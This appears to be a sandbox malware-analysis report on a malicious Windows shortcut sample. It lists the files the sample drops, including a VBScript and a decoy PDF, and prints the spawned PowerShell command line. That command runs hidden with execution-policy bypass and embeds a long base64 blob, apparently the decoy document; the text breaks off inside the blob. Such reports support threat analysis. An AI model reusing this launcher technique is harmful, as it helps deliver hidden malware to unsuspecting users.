Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
140AEcuVy7.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Nov
30 07:52:33 2023, mtime=Thu Nov 30 07:52:33 2023, atime=Thu Nov 30 07:52:33 2023, length=0, window=hide
|
initial sample
|
 |
|
|
C:\Users\Public\Libraries\Recorded.vbs
|
ASCII text, with very long lines (708), with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xfdfa5f68, page size 16384, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\55be8faf-6076-4f25-9e29-ee7ee9cdfb3a.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240930134117Z-159.bmp
|
PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 3, database pages 14, cookie 0x5, schema 4, UTF-8,
version-valid-for 3
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7180
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI46ff5.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehlaueuw.yqf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqkvfyiw.kd2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzsgmhdk.jho.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onro1u3v.pdn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uq2zlf43.1ne.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdwiwnyt.t1q.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9x48zfd_4niua0_5jg.tmp
|
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-30 09-41-15-662.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\2351a3dc-1c3b-40fd-b656-15c9bdc47dd9.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\41d075c6-81f5-4c39-b32d-67347b3fd59c.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\95c130ec-c7c6-4a79-a977-a793115afd75.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\e471c114-2162-4110-b6ef-c1565c55c78e.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\document.pdf
|
PDF document, version 1.4, 1 pages
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
|
ISO-8859 text, with very long lines (3486), with CRLF, CR line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\15d362c86149b66f.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7046Q27TCX0LY0SIK7MW.temp
|
data
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 42 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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Pf+jfUM3seLPsQl/3txvkF19+cWyZBNg3wt1pwEokeBMPP7O8UbrP/zFUWVAT5omnIcxQ5QIEXB1pQKKuCa0KTCIZmD5C6wGaYXM9iXhatuCOhQ0HCDNrdm3J2nfjINfRfb86rL8KlL8SuP5lcDzK5Y8vxL0+RWEvXh+oOf5FUvB4hA2kPQGqwGqBIoHgXVB1APZmpUgczR32C3qkQ/0w9AG1Oxut6iv1lXmV5dfrau+HZQNtH3Or644sDiQDTYTaD5E+eT5gUAbIWyIVgwlOIQhOtH8A3cA0BTcluIwEa8wmo/AvoCGCcQidbtF05ECdAkw6ItfgYIMKA10TQI4GmbYLZrOfiWw+ZUGUBooZFDrKmG3aDL7laAHv7qAHGDQAUmgEDCEIX4BsoHuMme/Ej6n2yf5uTzwEKi4/f9vMjAAAFphIaEKZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8IC9UeXBlIC9YT2JqZWN0IC9TdWJ0eXBlIC9JbWFnZSAvV2lkdGggMjA2NCAvSGVpZ2h0IDM0MzIgL0JpdHNQZXJDb21wb25lbnQgMSAKL0ltYWdlTWFzayB0cnVlIC9GaWx0ZXIgL0NDSVRURmF4RGVjb2RlIC9EZWNvZGVQYXJtcyA8PCAvSyAtMSAvQ29sdW1ucyAyMDY0ID4+IAovTGVuZ3RoIDM2NjIgPj4gCnN0cmVhbQ0K5AT4IQE3B1d3ff//XICdQb/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////mlBb3///////////gg9x//////////////////////////8mzjIUZBmUBDwLmo6ZUEEwVcLRcNQmgSWECpOHTCBUkgtNvNjSSwgq306Cn1Melp8XpapKt9Ljpf9JEVRr/S3S/1q1qv1lzvy5+8E1QZDFSVB/wnnDDfnD/3TYN9N/wfb63/g3u67fr/fXv7////9L///v+v/r7r/6/v6ekturpfee1S/eftJtJNLbStpJpmhJNpRW2lYqwg4pimFTFWC8MEGEwWGFEOIiIjD19KEsKP/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////LVBWUM4y633ly7tvfoN/2///v//6/hL+X1///H/hv+3/b//X9pdW11tpJhKxQQq1UR/8tUEAgoMnCkfIoMjik2T5BWR8zZSR2kModEHHnw/D21sjoJrdkLzfk3Tou2yWB0ffjW+mnrdINtO079bdfaaFJvfEaf6aeOk/f/eI9b//dL7+a1moZ4igzMMHhk5HA5sZ8zBkuFNmTmbMpbJ81RGM4/3yZs4ZDP/aVnFhUHD1tNNc4Ina5wU6EYM4O0zYObEvPZ8KQf54U0DngQ8R4KbGeFujwzDMRcz4p68wOy/1vCSp8sd2CcjdJgnIQenWvXrWnrr6hTpr6aB4TtO2117W/hQs9+vBUl6eaM2NhaNjmufby4/LeGeFTVIt3SQRdu+XmXD+5N6ray4aLcm+Zy3o1tk4Et3NDdINfaLh/X3/8HWvxdW91bS8ffr2t9J9ab/quv2FpWRz60mm2sVbozft3/g9f77d/6bpetf/9ra/7/9/n+2371/+lX//j7e1jsej/t//7b/4bVLHVf9tRx///x7VfCKH+P/6rQ7//+Ok1HuO/+3fet/zV6//+aff/5d2CKefXH/v/+xpVTt/v/6X//4Ip+37+19Xf//wr9f/dhvNHa0bHT/9PQN///1/1zY6KC/0/+v/qu2O/++j//r////HVv9L/6/31vb/Sf/H/8e///7qOP/qP/rpP/XX4//pOkH/pv////4RT+vjY/+/j/ULv+l//+l+l/qD///eWR/X/7Xr/6v10v9L/+m//X/S/////Ff/ouP/vf/O/RRf/Xfa/6/12vW/7/7/Wv/lu6//+X38cONP6C3/ddf9LeuF+6X/cn7Pf///a+v+2c+6/sh3pa+r039fel/9XX6X21Y9LrvSXe71/2wv/+p7U/v5phduuj3rf70tHv80gTNyWree29tLIV9Wlqrd99xqt6rHr2q6GYChO0lTRBJ9JtK3p0l7VEOdJ3SqEMu9tJ1CbaTaVhkdNWkE+27rTbZIfaDTX2r17shirSsd2nsba8VFBbilMBNil0opiorumO0LUKv3696f/8ML/7rppq6qDaitppQUNJVtfULaaeqiOIiI0IiItDL+IiIwQiIizWgwQjBNMuAmCFrEaPGLsIRB2hERERH0NBxERERERGCbERH9O4P8REetb6fKxwAQAQAAplbmRzdHJlYW0KZW5kb2JqCjYgMCBvYmoKPDwgL1R5cGUgL1hPYmplY3QgL1N1YnR5cGUgL0ltYWdlIC9XaWR0aCA0MDggL0hlaWdodCA1NiAvQml0c1BlckNvbXBvbmVudCAxIAovSW1hZ2VNYXNrIHRydWUgL0ZpbHRlciAvQ0NJVFRGYXhEZWNvZGUgL0RlY29kZVBhcm1zIDw8IC9LIC0xIC9Db2x1bW5zIDQwOCA+PiAKL0xlbmd0aCAxOTIgPj4gCnN0cmVhbQ0K5XVXCZlwJOzhDJQGc7rCAnsJppwoQPCB7QaafT1qnr0+9pr1TtkLfapsIPVEMIasJ90D219JvHqrf7rXyEH08hHaVLp0sFq3v2RoGPpWl+m/VtL/71Sur//9fSf6uDrf933vXvt+mn4+kPp35FQtek2+2u+/vrrlP/tJNPptroNfDSVBrTZDP2QtbTSyFT20ldD7x1fStpJtr7Xtdtr2q7SW1W2FttacNJbBfDCpwa1gwR3bIkY6cyDhGIjwAQAQCmVuZHN0cmVhbQplbmRvYmoKNyAwIG9iago8PCAvVHlwZSAvWE9iamVjdCAvU3VidHlwZSAvSW1hZ2UgL1dpZHRoIDE5NjggL0hlaWdodCAyMjMyIC9CaXRzUGVyQ29tcG9uZW50IDEgCi9JbWFnZU1hc2sgdHJ1ZSAvRmlsdGVyIC9DQ0lUVEZheERlY29kZSAvRGVjb2RlUGFybXMgPDwgL0sgLTEgL0NvbHVtbnMgMTk2OCA+PiAKL0xlbmd0aCAyNDE3NCA+PiAKc3RyZWFtDQotcS5aYKjNFGQVGmSESeVeSI2DlDNI+zbNBZZqgIczoyGZODlDNbOA56TTyGFOSaaZ0dmZJrar4WsNNPCDT7W77XT1BP//X2mgegwQ/1/11Qd+v6JD+qYJ6chXr6f/6Sev/pP9E3cjHeiTtE46f/X+qJZtZPP/XlntdPN9JtJo+Rf/ua/66STdrTr/X7aegb9BB1Gh/9/7qoX/zDv//LHjpf09f6f3/19/7//6ta/+tP9eQt+Z3pbdr/cff/SV//5b7VFv/j7iviYf63/8JWC///V6+ver/yx/6/sf///3XY9uv/mHf7X/+//////v5s6r/7/xyfd/G3//6F6H+3J5ji//9a/9lD+//2Sf/9Pcsf1tf3+i39N2///DX//+3fv//7/L//3321pr6+i+7drj/L/+l9E/32F+1tUX8eafTtf297X/W/1/XYV0vY2zb+9dLuvSvtiv9L//rxsftMfT/fxX/w2v+g3RcPaegrtO00009InbdF25rYaapEnbSJwHbStNA2idsO0Hb/02z5SbZHGnmsi3W9pJtkdtmylu000rTTtNNNO1tsj6r07Pln5IjvVsi4km4Ij7W7Ujhr1WyO3/V/28Nr00+7Wt71Sttdcl1r/f9en7/rpJpJ2ter0Ye14f/6f+t+vWrj6/0/+v/r+/X7/v9f//X7f1T//f///+r+msf9b/+////0v/H///V/939rX/3+v/+vpY7//pf/39f//v/il//j6WN6Q69P++Ev//9pLtLf+Evjv9//9dWl2lCS////r8VX/Ff1/+K8QWP4r1jjv/j1jEFxBV/2//4i9cQXX//rX36LH/38jq7f1+ujD9W/9tf/T1tGHsfB///5HYd4S5LvyOw/5L